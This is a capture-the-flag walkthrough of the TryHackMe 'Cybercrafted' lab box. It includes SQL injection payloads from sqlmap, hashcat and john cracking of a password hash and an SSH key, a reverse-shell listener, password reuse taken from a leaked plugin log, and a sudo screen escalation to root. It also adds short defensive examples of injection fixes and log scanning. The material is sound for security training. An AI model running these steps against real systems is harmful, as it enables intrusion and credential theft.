- URL: https://tryhackme.com/room/cybercrafted
- Target OS: Linux
- Rated Difficulty: Medium
DESCRIPTION
You have found an IP address of an in-development Minecraft server. Can you root it?
ENUM >> NMAP
Nmap scan report for cybercrafted.thm (10.10.142.63)
Host is up (0.33s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 37:36:ce:b9:ac:72:8a:d7:a6:b7:8e:45:d0:ce:3c:00 (RSA)
| 256 e9:e7:33:8a:77:28:2c:d4:8c:6d:8a:2c:e7:88:95:30 (ECDSA)
|_ 256 76:a2:b1:cf:1b:3d:ce:6c:60:f5:63:24:3e:ef:70:d8 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-title: Cybercrafted
|_http-favicon: Unknown favicon MD5: 4E1E2DCB46BCB45E53566634707765D9
|_http-server-header: Apache/2.4.29 (Ubuntu)
25565/tcp open minecraft Minecraft 1.7.2 (Protocol: 127, Message: ck00r lcCyberCraftedr ck00rrck00r e-TryHackMe-r ck00r, Users: 0/1)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb 12 13:04:30 2022 -- 1 IP address (1 host up) scanned in 2216.07 seconds
- Found at the bottom of http://cybercrafted.thm/index.html:
</body> <!-- A Note to the developers: Just finished up adding other subdomains, now you can work on them! --> </html>
- That sounds like an invitation for a vhost scan… 😉
ENUM >> GoBuster subdomain (vhost) scan
Found: store.cybercrafted.thm (Status: 403) [Size: 287]
Found: admin.cybercrafted.thm (Status: 200) [Size: 937]
NOTE: GoBuster's vhost scan will unfortunately return hits on every vhost it tries in the wordlist, and unlike the dir scans, you cannot set a list of status codes to return (or ignore). However, failed hits will return 404 status codes. A friendly piece of advice is don't simply grep the list by "Status: 200" to get all positives; I nearly missed store. because it was a 403. Instead, grep -v "Status: 404" will work a lot better for you to get a positive result list.
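The filtering advice above, as an added example (not part of the original writeup): a small parser for gobuster's vhost output that drops the 404 noise rather than keeping only 200s, so the 403 on store.cybercrafted.thm survives. The sample output is constructed; only the two real hits come from the scan above, and the noise-floor helper generalises the note to scans where the failure code is not 404.

```python
import re
from collections import Counter

# Constructed sample of gobuster vhost output: the two real hits from the
# scan above plus the kind of 404 line gobuster prints for every candidate.
SAMPLE_OUTPUT = """\
Found: www.cybercrafted.thm (Status: 404) [Size: 281]
Found: mail.cybercrafted.thm (Status: 404) [Size: 282]
Found: store.cybercrafted.thm (Status: 403) [Size: 287]
Found: dev.cybercrafted.thm (Status: 404) [Size: 281]
Found: admin.cybercrafted.thm (Status: 200) [Size: 937]
Found: test.cybercrafted.thm (Status: 404) [Size: 281]
"""

LINE_RE = re.compile(
    r"^Found: (?P<host>\S+) \(Status: (?P<status>\d{3})\) \[Size: (?P<size>\d+)\]"
)

def parse_vhost_lines(text):
    """Turn gobuster vhost output into (host, status, size) tuples."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            hits.append((m["host"], int(m["status"]), int(m["size"])))
    return hits

def positive_vhosts(text, noise_status=404):
    """Keep every hit whose status is not the failure status.

    This is the grep -v "Status: 404" approach from the note: a 403 is
    still a real vhost (the server knows the name, it just refuses us),
    so filtering for 200 only would drop store.cybercrafted.thm.
    """
    return [h for h in parse_vhost_lines(text) if h[1] != noise_status]

def baseline_status(text):
    """The most frequent status code is the scan's noise floor; use it
    when the failure code is something other than 404."""
    statuses = Counter(h[1] for h in parse_vhost_lines(text))
    return statuses.most_common(1)[0][0] if statuses else None

if __name__ == "__main__":
    noise = baseline_status(SAMPLE_OUTPUT)
    for host, status, size in positive_vhosts(SAMPLE_OUTPUT, noise):
        print(f"{host:30} {status} {size}")
```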
ENUM >> GoBuster dir scan on store.cybercrafted.thm
❯ gobuster dir -u http://store.cybercrafted.thm -w /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt -x php -t 20
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://store.cybercrafted.thm
[+] Method: GET
[+] Threads: 20
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2022/02/12 15:29:30 Starting gobuster in directory enumeration mode
===============================================================
/search.php (Status: 200) [Size: 838]
/assets (Status: 301) [Size: 333] [--> http://store.cybercrafted.thm/assets/]
ENUM >> SQLMap on store.cybercrafted.thm / search.php
- OK, so poking around the new website on http://store.cybercrafted.thm I found a search page that could be SQL injectable:
❯ sqlmap -u http://store.cybercrafted.thm/search.php --forms --crawl=2 --batch --dump webapp
___
__H__
___ ___[)]_____ ___ ___ {1.5.12#stable}
|_ -| . ['] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[*] starting @ 15:39:49 /2022-02-12/
[15:39:49] [INFO] starting crawler for target URL 'http://store.cybercrafted.thm/search.php'
[15:39:49] [INFO] searching for links with depth 1
[15:39:50] [INFO] searching for links with depth 2
[1/1] Form:
POST http://store.cybercrafted.thm/search.php
POST data: search=&submit=
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: search=&submit=] (Warning: blank fields detected): search=&submit=
[15:39:51] [INFO] resuming back-end DBMS 'mysql'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=JtBW' AND (SELECT 9659 FROM (SELECT(SLEEP(5)))dPlw) AND 'aFHR'='aFHR&submit=
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: search=JtBW' UNION ALL SELECT NULL,CONCAT(0x71706a7671,0x4c564c4b42736f6b656c70474170766558515a48614c5951454c4543436176577a686976497a5a44,0x7176706a71),NULL,NULL-- -&submit=
---
[15:39:51] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.04 (bionic)
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[15:39:51] [INFO] fetching tables for database: 'webapp'
[15:39:51] [INFO] fetching columns for table 'admin' in database 'webapp'
[15:39:52] [INFO] fetching entries for table 'admin' in database 'webapp'
[15:39:52] [INFO] recognized possible password hashes in column 'hash'
Database: webapp
Table: admin
[2 entries]
+----+------------------------------------------+---------------------+
| id | hash | user |
+----+------------------------------------------+---------------------+
| 1 | <REDACTED> | xXUltimateCreeperXx |
| 4 | <REDACTED> | web_flag |
+----+------------------------------------------+---------------------+
CREDS - xXUltimateCreeperXx password hash
FLAG - Web app flag
- Win win, a flag and a password hash! 😉
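To show why sqlmap could dump the admin table through search.php, here is an added example (not the room's own PHP) of the bug pattern beside its fix, using SQLite in place of MySQL. The item table, its column names and the hash/flag values are constructed stand-ins; the only thing taken from the page is that the search query returns 4 columns and the admin table has id, hash and user.

```python
import sqlite3

def build_db():
    """In-memory stand-in for the 'webapp' database (constructed sample data;
    the real store table is unknown, only that the search query has 4 columns)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE items(id INTEGER, name TEXT, price REAL, stock INTEGER);
        INSERT INTO items VALUES (1, 'Diamond Pickaxe', 9.99, 12), (2, 'Creeper Plush', 4.50, 3);
        CREATE TABLE admin(id INTEGER, hash TEXT, user TEXT);
        INSERT INTO admin VALUES (1, '<sha1 hash>', 'xXUltimateCreeperXx'), (4, '<flag>', 'web_flag');
    """)
    return conn

def search_vulnerable(conn, term):
    """String-concatenated query: the search term becomes part of the SQL text,
    which is exactly what lets sqlmap's UNION payload pull rows out of 'admin'."""
    sql = "SELECT id, name, price, stock FROM items WHERE name LIKE '%" + term + "%'"
    return conn.execute(sql).fetchall()

def search_safe(conn, term):
    """Parameterised query: the driver binds the term as a value, so the same
    input is matched literally and can never change the statement."""
    sql = "SELECT id, name, price, stock FROM items WHERE name LIKE ?"
    return conn.execute(sql, ("%" + term + "%",)).fetchall()

# Same shape as sqlmap's UNION payload in the output above (4 NULL-padded
# columns, closing quote, trailing '-- -' comment); CONCAT is spelled || in SQLite.
UNION_PAYLOAD = "JtBW' UNION ALL SELECT NULL,user||':'||hash,NULL,NULL FROM admin-- -"

if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", search_vulnerable(db, UNION_PAYLOAD))
    print("safe      :", search_safe(db, UNION_PAYLOAD))
```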
ENUM >> HashCat xXUltimateCreeperXx’s password
hashcat -m 100 admin_pass.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i5-6200U CPU @ 2.30GHz, 5121/5185 MB (2048 MB allocatable), 4MCU
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
<REDACTED>:diamond123456789
Session..........: hashcat
Status...........: Cracked
Hash.Name........: SHA1
Hash.Target......: 88b949dd5cdfbecb9f2ecbbfa24e5974234e7c01
Time.Started.....: Sat Feb 12 15:54:39 2022 (3 secs)
Time.Estimated...: Sat Feb 12 15:54:42 2022 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2553.1 kH/s (0.61ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 8638464/14344385 (60.22%)
Rejected.........: 0/8638464 (0.00%)
Restore.Point....: 8634368/14344385 (60.19%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: diancarol -> diamada
Started: Sat Feb 12 15:54:15 2022
Stopped: Sat Feb 12 15:54:44 2022
CREDS - xXUltimateCreeperXx website
- Boom! We got creds! Let's use them to log in to the http://admin.cybercrafted.thm site:
PRIVESC >> Reverse Shell…
- The screenshot kind of says it all, just a simple bash reverse shell in the command box:
- … and there is our shell access! 😉
❯ nc -lnvp 1337
listening on [any] 1337 ...
connect to [10.9.0.248] from (UNKNOWN) [10.10.151.36] 43298
bash: cannot set terminal process group (1095): Inappropriate ioctl for device
bash: no job control in this shell
www-data@cybercrafted:/var/www/admin$
CREDS - xxultimatecreeperxx SSH key
ENUM >> cracking xxultimatecreeperxx's password-protected ssh key
- OK, finding xxultimatecreeperxx's ssh key is great and all, but it is protected with a password… let's feed it to john! First, we need to convert it to a format that john can crack using ssh2john.py, then we can throw the hash at john to do all the heavy lifting:
❯ python2.7 /usr/share/john/ssh2john.py xxultimatecreeperxx > xxultimatecreeperxx.hash
❯ john --wordlist=/usr/share/wordlists/rockyou.txt xxultimatecreeperxx.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
<REDACTED> (?)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:43 DONE (2022-02-12 16:13) 0.02310g/s 331370p/s 331370c/s 331370C/s a6_123..*7¡Vamos!
Session completed
CREDS - xxultimatecreeperxx SSH key password
- Now to test our freshly cracked ssh key:
❯ ssh -i xxultimatecreeperxx xxultimatecreeperxx@cybercrafted.thm
Enter passphrase for key 'xxultimatecreeperxx':
xxultimatecreeperxx@cybercrafted:~$
LOOT >> Minecraft server flag
xxultimatecreeperxx@cybercrafted:/opt/minecraft$ cat minecraft_server_flag.txt
<REDACTED>
FLAG - Minecraft server
ENUM >> dodgy "LoginSystem" plugin…
- OK there is a super-sus looking plugin installed on this server named LoginSystem; it consists of 4 files:
xxultimatecreeperxx@cybercrafted:/opt/minecraft/cybercrafted/plugins/LoginSystem$ ls
language.yml log.txt passwords.yml settings.yml
- I bet that log.txt has something juicy…
LOOT >> log.txt from LoginSystem leaks passwords!!!
[2021/06/27 11:25:07] [BUKKIT-SERVER] Startet LoginSystem!
[2021/06/27 11:25:16] cybercrafted registered. PW: <REDACTED>
[2021/06/27 11:58:52] [BUKKIT-SERVER] Startet LoginSystem!
[2021/06/27 11:59:01] madrinch logged in. PW: Password123
CREDS - cybercrafted
- cybercrafted's Minecraft creds! (madrinch doesn't have an account on this system)… surely they wouldn't be so outright stupid as to use that as their ssh password as well?
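The log.txt leak above is the kind of thing a plugin audit should catch before an attacker does. As an added example (not part of the original writeup), here is a scanner over the LoginSystem log format that reports each line recording a plaintext password while masking the value so the report itself does not re-leak it. The sample lines are a constructed copy of the log shown above; the cybercrafted password is a placeholder.

```python
import re

# Constructed copy of the LoginSystem log.txt lines shown above
# (the cybercrafted password is a placeholder, not the real one).
SAMPLE_LOG = """\
[2021/06/27 11:25:07] [BUKKIT-SERVER] Startet LoginSystem!
[2021/06/27 11:25:16] cybercrafted registered. PW: s3cretP@ss
[2021/06/27 11:58:52] [BUKKIT-SERVER] Startet LoginSystem!
[2021/06/27 11:59:01] madrinch logged in. PW: Password123
"""

CRED_LINE = re.compile(
    r"^\[(?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2})\] "
    r"(?P<user>\S+) (?P<event>registered|logged in)\. PW: (?P<pw>.+)$"
)

def mask(secret, keep=2):
    """Show only the first `keep` characters so a report never re-leaks the value."""
    return secret[:keep] + "*" * max(len(secret) - keep, 0)

def find_leaked_credentials(log_text):
    """Return one finding per log line that records a plaintext password.

    Lines in the LoginSystem format are parsed fully; any other line that
    still contains 'PW:' is reported as an unparsed hit so a format change
    in the plugin does not silently hide a leak.
    """
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = CRED_LINE.match(line)
        if m:
            findings.append({"line": lineno, "ts": m["ts"], "user": m["user"],
                             "event": m["event"], "pw": mask(m["pw"])})
        elif "PW:" in line:
            findings.append({"line": lineno, "ts": None, "user": None,
                             "event": "unparsed",
                             "pw": mask(line.split("PW:", 1)[1].strip())})
    return findings

if __name__ == "__main__":
    for f in find_leaked_credentials(SAMPLE_LOG):
        print(f"line {f['line']}: {f['event']} {f['user']} -> {f['pw']}")
```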
PRIVESC >> su cybercrafted
- … I guess they are that stupid.
xxultimatecreeperxx@cybercrafted:/opt/minecraft/cybercrafted/plugins/LoginSystem$ su cybercrafted
Password:
cybercrafted@cybercrafted:/opt/minecraft/cybercrafted/plugins/LoginSystem$
LOOT >> user.txt
cybercrafted@cybercrafted:~$ cat user.txt
<REDACTED>
FLAG - user.txt
PRIVESC >> access to the server's screen session running as root
- OK we have moved up the user chain to the account that runs the Minecraft server, and more importantly we have their password… what can they do with sudo?:
cybercrafted@cybercrafted:~$ sudo -l
[sudo] password for cybercrafted:
Matching Defaults entries for cybercrafted on cybercrafted:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User cybercrafted may run the following commands on cybercrafted:
(root) /usr/bin/screen -r cybercrafted
cybercrafted@cybercrafted:~$ sudo /usr/bin/screen -r cybercrafted
- MMMM SCREEN! Connecting to this drops us on the console of the minecraft server… I did play with log4j (because why not! it was how the log4j exploit was discovered!) but didn't get far… Oh well, simply hitting ctrl-a c drops us to a shell anyway:
# whoami
root
# cd /root
# cat root.txt
<REDACTED>